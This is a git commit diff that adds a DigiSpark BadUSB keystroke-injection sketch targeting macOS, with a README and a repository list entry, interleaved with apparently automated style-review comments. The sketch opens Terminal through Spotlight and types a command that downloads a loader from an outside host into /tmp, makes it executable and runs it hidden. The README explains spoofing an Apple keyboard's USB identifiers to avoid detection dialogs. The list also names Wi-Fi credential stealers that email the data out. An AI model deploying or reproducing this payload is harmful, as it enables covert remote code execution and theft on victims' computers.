+ add macos payload script

Abdullah Alhazmy 2020-10-26 11:14:32 +03:00
parent aa45323b35
commit ccf801503d
3 changed files with 49 additions and 0 deletions


@ -0,0 +1,37 @@
#include "DigiKeyboard.h"
/***
*
* This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable,
* executes it, and closes the terminal window.
*
***/
#define MOD_CMD_LEFT 0x00000008
void setup() {
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("terminal");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("bash");
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print("nohup wget https://sheep.casa/payloads/linux_loader -P /tmp && nohup chmod +x /tmp/linux_loader && nohup /tmp/linux_loader & exit");
DigiKeyboard.delay(500);
DigiKeyboard.println("disown $!");
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_Q, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(10000);
}
void loop() {
}
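Review bot: `MOD_CMD_LEFT` is defined at the top of the sketch but never referenced; every modifier keystroke in `setup()` uses `MOD_GUI_LEFT`. Remove the define, or use it consistently, so the file has a single name for the Command key. The header comment also says only that the sketch "downloads the loader", while the remote host and the `/tmp/linux_loader` path appear only inside the long `print` string; naming both in the comment block would let anyone auditing or lab-testing with this sketch see at a glance which network request and which file it produces.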

MacOS_Payload/README.md Normal file

@ -0,0 +1,10 @@
# Mac (OSX) Payload
In order to prevent the keyboard configuration dialog box from appearing when the DigiSpark is plugged into an Apple computer, we must configure the DigiSpark to appear as if its an Apple keyboard.
VID and PID are defined in the file `~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h` We will replace the existing file with a modified Apple version when compiling the script for OSX. When we change Vendor Name and Device Name, we also have to adapt the constants for the name length.
It is very similar to what weve used to exploit Linux machines. The major difference is the way the terminal is opened. Weve had to modify our OSX version to use `DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);`, which will open Spotlight search. The code will delay for .5 seconds, and search `terminal`, delay for .5 seconds, and press enter, opening the terminal.
After this, in order to ensure we arent using Z Shell, well enter `bash`. From this point on the rest of the code is exactly the same as our Linux payload. It too downloads linux_loader, which downloads and runs `linux_payload.py`.
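Review bot: The four body paragraphs of the new README sit on consecutive lines with no blank line between them, so Markdown will render them as one run-on block; separate them with blank lines. The sentence ending in `usbconfig.h` is missing its period, and "its", "weve", "arent" and "well" have lost their apostrophes. The path also pins the `1.6.7` package directory, which will not match other installed versions of the board package, so the text should say that this path component varies.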


@ -23,6 +23,7 @@ Configure the Arduino IDE for the DigiSpark using: https://digistump.com/wiki/di
- **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive - **WiFi_Profile_Grabber**: Extracts wifi profiles and saves the csv to a USB drive
- **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it - **WiFi_Profile_Mailer**: Writes the wireless network credentials to a csv file and emails it
- **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows - **Window_Jammer**: Spams ALT + F4 and CTRL + W key combos to force close all active windows
- **MacOS_Payload**: This is an attack for Mac (OSX) machines. It opens up a terminal window, and executes the bash command. It then downloads the loader, sets it to executable, executes it, and closes the terminal window.
# See the scripts in action # See the scripts in action
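Review bot: The new `MacOS_Payload` entry is appended after `Window_Jammer`, although the visible entries above it are in alphabetical order, and it copies the sketch's header comment verbatim instead of following the one-sentence, verb-first style of its neighbours ("Extracts …", "Writes …", "Spams …"). Move it to its alphabetical position and shorten it to a single sentence in that style.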
@ -43,6 +44,7 @@ Click the gifs to see the full video
- **Vel1khaN** - **Vel1khaN**
- **slipperyavocado** - **slipperyavocado**
- **bernsteining** - **bernsteining**
- **alhazmy13**
# Resources # Resources